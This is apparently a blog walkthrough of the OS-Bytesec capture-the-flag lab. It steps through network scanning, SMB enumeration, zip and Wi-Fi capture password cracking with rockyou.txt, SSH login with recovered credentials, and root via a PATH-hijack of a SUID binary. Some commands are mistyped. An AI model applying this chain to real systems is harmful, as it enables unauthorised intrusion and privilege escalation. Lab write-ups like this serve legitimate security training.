OS-Bytesec download here OS-Bytesec walkthrough
In this Blog, we slove OS-Bytesec walkthrough This lab is designed by Rahul Gehlaut
Network Scanning: I use Netdiscover is simple ARP Scanner to scan for live hosts in a network.
netdiscover
As you can see from the image our VM IP is 192.168.1.40 Now we can be scanning our VM IP with Nmap.
nmap -A 192.168.1.40
As can be seen, there are only three port is open port: 80,139,445,2525
As port 80 is open, let us try and open the IP in the browser as shown in the image below
I did a basic enumeration with I see Web page source code and we see the bottom page ####GET####SMB####Fee
Now enumeration SMB with enum4linux
enum4linux -A 192.168.1.40
And I found after enumerate 3 SMB user Sagar, blackjax, smb, after trying login attempt I see smb user without password login.
login with SMB smbclient //192.168.1.40/smb -U smb -p and Enter twice I login into SMB
smbclient //192.168.1.40/smb -U smb -p
And we see after login smb found 2 file main.txt, safe.zip now download the file our local system with get command
get safe.zip
And after download all files we see safe.zip file is locked now cracking safe file with fcrackzip toll Dictionary Attack with file rockyou.txt
fcrakzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
And I found safe.zip file password
Password: hacker1
Now unzip our safe file with password hacker1
unzip safe.zip
After unzipping safe file we 2 file secret.jpg, user.cap
Cracking user.cap file with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
After crack cap file found an ssh username: blackjax and password: snowflake
username: blackjax
password: snowflake
Login with ssh username blackjax and password snowflake
And Found a our first flag blackjax user home directory
cat user.txt
Privilege Escalation
find / -type f -perm -u=s 2>/dev/null
Again, after some basic enumeration checks(SUID, GUID, Kernel exploits, etc), I saw that the /usr/bin/netscan application had the permission to be executed as SUDO without the SUDO password:
and I run the script
/usr/bin/netscan
after running the script I see the script working background netstat command
Privilege Escalation netscan PATH Variable I go to /tmp directory and run the command
$PATH
ct /tmp
echo "/bin/bash" > netstat
export PATH=/tmp:$PATH
and run the script Again
/usr/bin/netscan
and I got root shell check with id command
id
cd /root
and I go to root folder and run cat root.txt
We got the final root flag.













